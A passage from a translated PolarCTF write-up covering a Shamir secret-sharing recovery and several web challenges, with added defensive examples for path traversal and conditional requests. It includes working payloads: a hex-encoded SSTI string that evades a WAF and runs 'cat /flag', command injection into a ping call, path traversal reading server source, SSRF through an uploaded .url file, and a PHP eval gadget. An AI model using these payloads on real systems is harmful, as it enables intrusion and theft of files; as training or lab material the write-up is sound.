        return g, x - (b // a) * y, y

    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception("模逆不存在")
    return x % m


def lagrange_interpolation(shares, p):
    """Recover the constant term (the secret) from k points"""
    k = len(shares)
    secret = 0
    for i in range(k):
        xi, yi = shares[i]
        term = yi
        for j in range(k):
            if i != j:
                xj = shares[j][0]
                num = (0 - xj) % p
                den = (xi - xj) % p
                term = (term * num * mod_inverse(den, p)) % p
        secret = (secret + term) % p
    return secret


# Recover the secret from the first 5 shares (any 5 will do)
selected_shares = shares[:5]
secret_int = lagrange_interpolation(selected_shares, p)

# Convert to bytes to get the flag
flag = long_to_bytes(secret_int)
print("恢复的 flag:", flag.decode(errors='ignore'))
print("秘密整数:", secret_int)
```

Final flag: flag{shamir_p_recovery_test}
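The write-up states that p had to be recovered before interpolating and that any 5 of the 11 shares give the same secret. The added example below (not part of the original write-up, and not the method the author used to find p) turns that into a check on a candidate prime: with more shares than the threshold, every k-subset must interpolate to the same constant term. The toy prime, polynomial and shares are constructed.

```python
from itertools import combinations


def recover_secret(shares, p):
    """Lagrange interpolation at x = 0 over GF(p); returns the constant term."""
    secret = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % p
                den = den * (xi - xj) % p
        # pow(den, -1, p) is the modular inverse (Python 3.8+)
        secret = (secret + yi * num * pow(den, -1, p)) % p
    return secret


def check_candidate_prime(shares, k, p):
    """Return the secret if every k-subset of the shares agrees on it under p, else None."""
    # Shares are residues mod p, so any coordinate >= p rules the candidate out.
    if any(not (0 <= v < p) for share in shares for v in share):
        return None
    results = {recover_secret(list(subset), p) for subset in combinations(shares, k)}
    return results.pop() if len(results) == 1 else None


# Constructed toy scheme: k = 3 (degree-2 polynomial), 5 shares at x = 1..5.
P_TRUE = 2**61 - 1
SECRET = int.from_bytes(b"s3cret", "big")
COEFFS = [SECRET, 3, 2**60]                 # constructed coefficients: a0 is the secret
SHARES = [(x, sum(c * x**i for i, c in enumerate(COEFFS)) % P_TRUE)
          for x in range(1, 6)]


if __name__ == "__main__":
    for candidate in (2**31 - 1, 2**89 - 1, P_TRUE):
        print(candidate, check_candidate_prime(SHARES, 3, candidate))
```

Only the true prime makes all ten 3-subsets agree; a candidate that is too small fails the range test, and a wrong larger prime yields conflicting constant terms.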

Part 3: WEB

3-1 偷吃蟠桃 (Stealing the Peaches)

Approach: Look at the picture. Enter the following directly in the console:

```javascript
score = 30;
endLevel(); // force the level-clear
```

This advances to level 2, whose target score is 1,000,000 points, which cannot be reached by playing normally. Triggering the level-clear request directly from the browser console yields the flag.

```javascript
score = 1000000;
currentLevel = 1;
endLevel();
```

Flag: flag{wukong_catch_peach_business_logic_bypass}

3-2 uploadfile

Approach: Upload an image webshell. The server replies that the file is PHP and that even a successful upload would run into problems, so rethink the approach.

Uploading test3.jpg (content `<?php echo 1; ?>`) was blocked with "Connection was reset" ❌

This shows that the server inspects the file content: as soon as it detects `<?php` it drops the connection, whatever the extension is.

3-3 身份检验系统 (Identity Verification System)

Approach: The page shows an identity permission check system. Current permission: normal user. Hint: the keyword admin must not appear in the parameters.

This is a CTF variable-overwrite challenge.

http://132cdec4-1146-4aad-a6c2-c1c097aa9d2f.game.polarctf.com:8090/?is_admin=1

flag{8271ea578adae32da86873d13e473407}

The following also works:

http://132cdec4-1146-4aad-a6c2-c1c097aa9d2f.game.polarctf.com:8090/??role=user&is_admin=1

3-4 狗黑子的股市之路 (Gou Heizi's Road in the Stock Market)

Approach: http://409cf915-85cd-457b-87a3-1175288a124d.game.polarctf.com:8090/flag.php

Intercept the request and change the value to yes.

Flag: flag{a1cfb8cc1fca697b47f989b34e59b372}

3-5 BH

Approach: The page content is as follows:

```
系统执行命令:
ping -c 2 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 字节数据
来自 127.0.0.1 的 64 字节:序列号=0,生存时间=42,时间=0.033 毫秒
来自 127.0.0.1 的 64 字节:序列号=1,生存时间=42,时间=0.041 毫秒
--- 127.0.0.1 ping 统计信息 ---
已发送 2 个数据包,已接收 2 个数据包,丢包率为 0%。
往返时间最小值/平均值/最大值 = 0.033/0.037/0.041 毫秒
```

```php
<?php
error_reporting(0);
echo "==== It's another order execution. ====<br>";
echo "Carefully look at the purpose of the code before executing any code<br><br>";
$input = $_GET['cmd'];
// The cmd parameter is appended to the shell command without any filtering
$command = "ping -c 2 127.0.0.1" . $input;
echo "System executing command:<br>$command<br>";
echo "<pre>";
passthru($command);
echo "</pre>";
highlight_file(__FILE__);
?>
```

Use a pipe character to separate the cmd command from the ping command. In this environment that only returns a fake flag; the real flag appears only under CLI execution, so flag.php has to be run from the command line with `php flag.php` to print the real flag.

Final flag: flag{030e77f73a4cb26a111daf0470c3956f}

3-6 dairy

Approach: The home page lets you write a diary entry. Entering `{{7*7}}` returns 49, so this should be SSTI (server-side template injection).

```
{{config}}
Malicious input detected! Blocked by WAF.

{{self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag').read()}}
Malicious input detected! Blocked by WAF.
```

I kept trying different ways to get past this WAF. In the end I stopped using any literal characters, so that the expression

```
url_for.__globals__.get('os').popen('cat /flag').read()
```

is written as:

```
{{url_for|attr('\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f')|attr('\x67\x65\x74')('\x6f\x73')|attr('\x70\x6f\x70\x65\x6e')('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67')|attr('\x72\x65\x61\x64')()}}
```

3-7 你会渗透吗 (Can You Pentest?)

Approach: Enter test/test and look at the content. The page lists a social-engineering dictionary generator at /tools/tools.zip with the message "insufficient permission, cannot be accessed directly", which hints that privileges have to be raised to a high-privilege account such as admin.

Then scan the directories. The dirsearch scan finished and turned up several key pieces of information.

Important findings:

1. Key paths:
   - /api.php -> 302 redirect to /index.php (already known)
   - /admin.php -> 302 redirect to /index.php
   - /assets/ -> 301 redirect, 403 Forbidden
   - /tools/ -> 301 redirect, 403 Forbidden (the tools directory seen earlier on the home page)

Then move on to other approaches. The address of this image is:

http://3a447e39-5b05-42c4-853f-9fb6c76da251.game.polarctf.com:8090/api.php?action=download&file=picture/第一次相遇.png

The home page reveals a download endpoint: api.php?action=download&file=...

- This endpoint allows arbitrary file download / path traversal and can be used to read source code.

The web root is usually /var/www/html/ (the Linux default). Keep reading one level higher each time; once ../../../../var/www/html/api.php is read, the source itself states the vulnerabilities and functions:

- download has path traversal
- reset_password has CSRF
- send_message / check_messages are the messaging functions
- Then read ../../../../var/www/html/admin.php; the page contains the flag directly.

Key request:

/api.php?action=download&file=../../../../var/www/html/admin.php

Flag: flag{4323ce6fff96d58cfd37f18747e28c18}
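The download endpoint above returns whatever path the `file` parameter resolves to. As an added example (not from the original write-up and not the challenge's code, which is PHP), this is the confinement check such a handler needs, shown in Python; the directory layout and the function names are assumptions made for the demonstration.

```python
import os
import tempfile


class PathTraversal(Exception):
    """The requested path resolves outside the download directory."""


def resolve_download(base_dir, requested):
    """Return the real path of `requested` only if it is a file inside base_dir."""
    base = os.path.realpath(base_dir)
    # realpath() collapses ".." segments and resolves symlinks; join() discards
    # base entirely when `requested` is absolute, which the check below also catches.
    target = os.path.realpath(os.path.join(base, requested))
    # commonpath() compares whole path components, so a sibling directory such
    # as "files_backup" does not pass as a prefix of "files".
    if os.path.commonpath([base, target]) != base:
        raise PathTraversal(requested)
    if not os.path.isfile(target):
        raise FileNotFoundError(requested)
    return target


def build_sandbox():
    """Constructed layout: <tmp>/html/admin.php beside <tmp>/html/files/picture/a.png."""
    root = tempfile.mkdtemp()
    files = os.path.join(root, "html", "files")
    admin = os.path.join(root, "html", "admin.php")
    os.makedirs(os.path.join(files, "picture"))
    with open(admin, "w") as fh:
        fh.write("<?php /* constructed stand-in for a sensitive source file */ ?>")
    with open(os.path.join(files, "picture", "a.png"), "wb") as fh:
        fh.write(b"\x89PNG")
    # A symlink planted inside the download directory that points outside it.
    os.symlink(admin, os.path.join(files, "link.png"))
    return files, admin


def classify(base_dir, requested):
    """Summarise what the handler would do with one request value."""
    try:
        resolve_download(base_dir, requested)
        return "served"
    except PathTraversal:
        return "blocked"
    except FileNotFoundError:
        return "not found"


if __name__ == "__main__":
    files_dir, admin_path = build_sandbox()
    for value in ("picture/a.png", "../admin.php",
                  "../../../../var/www/html/admin.php", admin_path, "link.png"):
        print(f"{value!r:45} {classify(files_dir, value)}")
```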

3-8 路飞的HTTP协议冒险 (Luffy's HTTP Protocol Adventure)

Approach: Here, changing the number to 800 should lead to the next level. It went straight to the next level.

Following the parameter, enter the next level and get Robin's hint.

Gear 3

Franky: "Luffy, a man should communicate in a 'special way'! For example, bring the request header X-Luffy-Gear3 with the value BoneInflate."

Use curl directly:

```
curl -b cookie.txt -H "X-Luffy-Gear3: BoneInflate" "http://91eca41c-6fa0-465d-9baa-237c5080ec21.game.polarctf.com:8090/gear3.php"
```

This successfully triggered the Gear 3 system; both conditions were met:

✅ Communication protocol: detected (the X-Luffy-Gear3: BoneInflate header took effect)
✅ Bone inflation command: executed successfully

But the flag was still not shown directly, so a final step may be needed. Continuing:

Rayleigh: "Luffy, the proof of training is often left in the browser. You need the gear4 and Trainer authentication. Remember, I am Rayleigh, first mate of the Pirate King Roger, and I look forward to seeing you take the form of BoundMan."

- Cookie: Trainer=Rayleigh lets the trainer authentication pass
- Cookie: gear4=BoundMan lets the form state pass
- A valid PHPSESSID must be sent along with them

```
curl -b cookie.txt -b "gear4=BoundMan; Trainer=Rayleigh" "http://3cacf02d-e48a-4d0b-8ae4-363eda972868.game.polarctf.com:8090/gear4.php"
```

Then visit:

- /clear_seal.php

which shows:

Jinbe: "Luffy, before clearing it, first confirm that it is still in its current state. Otherwise, this seal will not accept your request."

- Allow: GET, DELETE
- A direct DELETE returns 428 Precondition Required
- The hint says to "first confirm that it is still in its current state"
- The response also gives:

```
curl -v -X DELETE -b "gear4=BoundMan; Trainer=Rayleigh" "http://3cacf02d-e48a-4d0b-8ae4-363eda972868.game.polarctf.com:8090/clear_seal.php" 2>&1 | findstr ETag
```

The response returns: ETag: "seal-memory-v1"

- Etag: "seal-memory-v1"

So the final correct method is:

- Send a valid session
- Send gear4=BoundMan; Trainer=Rayleigh
- To /clear_seal.php, send:
  - DELETE
  - If-Match: "seal-memory-v1"

This prompts a redirect to:

- 0nep1ecef1@g.php

Finally, visit this page to get the flag.

flag{15b606dc5a9492c260984aa627338bfd}
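The last step relies on standard HTTP conditional-request semantics: the server demands a precondition (428) and accepts the DELETE only when If-Match carries the resource's current ETag. The added example below (not from the original write-up and not the challenge's server code) models that server-side decision, including the strong comparison that If-Match requires. The `Resource` class and its version-numbered ETag scheme are assumptions; only the tag value "seal-memory-v1" comes from the page.

```python
import re

# An entity-tag is an optional weak prefix W/ followed by a quoted string.
ETAG_RE = re.compile(r'(?:W/)?"[^"]*"')


def strong_match(candidate, current):
    """Strong comparison: neither tag may be weak and both must be identical."""
    return (not candidate.startswith("W/")
            and not current.startswith("W/")
            and candidate == current)


def conditional_delete(headers, current_etag):
    """Decide a DELETE on a resource that requires a precondition.

    current_etag is the resource's current validator, or None if it no longer exists.
    Returns (status, reason).
    """
    normalized = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    if_match = normalized.get("if-match")
    if if_match is None:
        return 428, "Precondition Required"    # unconditional DELETE refused
    if current_etag is None:
        return 412, "Precondition Failed"      # nothing current to match, even for "*"
    if if_match.strip() == "*":
        return 204, "No Content"               # any current representation matches
    tags = ETAG_RE.findall(if_match)           # If-Match may list several tags
    if any(strong_match(tag, current_etag) for tag in tags):
        return 204, "No Content"
    return 412, "Precondition Failed"          # client acted on stale state


class Resource:
    """Hypothetical resource whose ETag changes on every update."""

    def __init__(self, body):
        self.body, self.version = body, 1

    @property
    def etag(self):
        return f'"seal-memory-v{self.version}"'

    def update(self, body):
        self.body, self.version = body, self.version + 1


def demo():
    seal = Resource("sealed")
    seen = seal.etag                                   # validator learned from an earlier response
    statuses = [conditional_delete({}, seal.etag)[0]]  # no precondition
    statuses.append(conditional_delete({"If-Match": "W/" + seen}, seal.etag)[0])  # weak tag
    seal.update("resealed")                            # state changes after the client looked
    statuses.append(conditional_delete({"if-match": seen}, seal.etag)[0])         # stale tag
    statuses.append(conditional_delete({"If-Match": f'"other", {seal.etag}'}, seal.etag)[0])
    return statuses


if __name__ == "__main__":
    print(demo())
```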

3-9 TOP10大考察 (The Big TOP10 Test)

Approach: The page has login and registration. My guess is that it relates to the three aspects below, and since the challenge tests the web top 10 vulnerabilities, start by registering and logging in.

After registering, test the items above one by one to see which of them is useful. There are notes and similar features, which feels a lot like an SSRF challenge I did before.

Then check whether the internal API can be reached directly:

http://9ee157e6-9599-4c03-9ffb-e32fa989abae.game.polarctf.com:8090/api.php?action=getFlag

This returns:

```
{"error":"Access denied - Internal API only"}
```

This shows that the API only allows local access (127.0.0.1) and cannot be called directly from outside.

Create a .url file so that the server itself visits my address, which achieves SSRF. Write the following content to the file:

```ini
[InternetShortcut]
URL=http://127.0.0.1/api.php?action=getFlag
```

After uploading this file, use the file-sharing feature, because its file sharing triggers the SSRF directly. The file I uploaded was uploads/1.url.

Final flag: flag{SSRF_WAF_Byp4ss_Curl_Url_2026Summer}

Summary: upload a .url file → the server parses the URL → it requests the internal API → get the flag

3-10 Polar_校园图库 (Polar Campus Gallery)

Approach: File contents:

```php
<?php
class Helper {
    public $type;
    public $cmd;

    // Runs when a Helper object is destroyed; evaluates $cmd if $type is 'eval'
    function __destruct() {
        if ($this->type === 'eval') {
            eval($this->cmd);
        }
    }
}
?><!DOCTYPE html>
<html>
<head><title>Polar 校园图库</title></head>
<body>
<h1>Polar 校园图库</h1>
<p><a href="upload.php">上传图片</a> | <a href="view.php?file=uploads/demo.php">查看示例</a></p>
</body>
</html>
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!isset($_FILES['image'])) {
        die('未选择文件');
    }
    $file = $_FILES['image'];
    // Client-supplied MIME type check
    $allowed_types = ['image/gif', 'image/jpeg', 'image/png'];
    if (!in_array($file['type'], $allowed_types)) {
        die('不允许的文件类型');
    }
    // Magic-byte check on the first 4 bytes
    $header = file_get_contents($file['tmp_name'], false, null, 0, 4);
    $gif = "\x47\x49\x46\x38";
    $png = "\x89\x50\x4E\x47";
    $jpg1 = "\xFF\xD8\xFF\xE0";
    $jpg2 = "\xFF\xD8\xFF\xE1";
    if ($header !== $gif && $header !== $png && $header !== $jpg1 && $header !== $jpg2) {
        die('非法的图片文件头');
    }
    // Extension allow-list
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ['gif', 'jpg', 'jpeg', 'png'])) {
        die('不允许的扩展名');
    }
    $new_name = md5(uniqid(rand(), true)) . '.' . $ext;
    $upload_dir = 'uploads/';
    if (!move_uploaded_file($file['tmp_name'], $upload_dir . $new_name)) {
        die('上传失败');
    }
    echo '上传成功,文件名:' . $new_name;
    exit;
}
?>
```

The HTML part of the page that follows ("上传图片", "上传你的校园风景") is cut off here.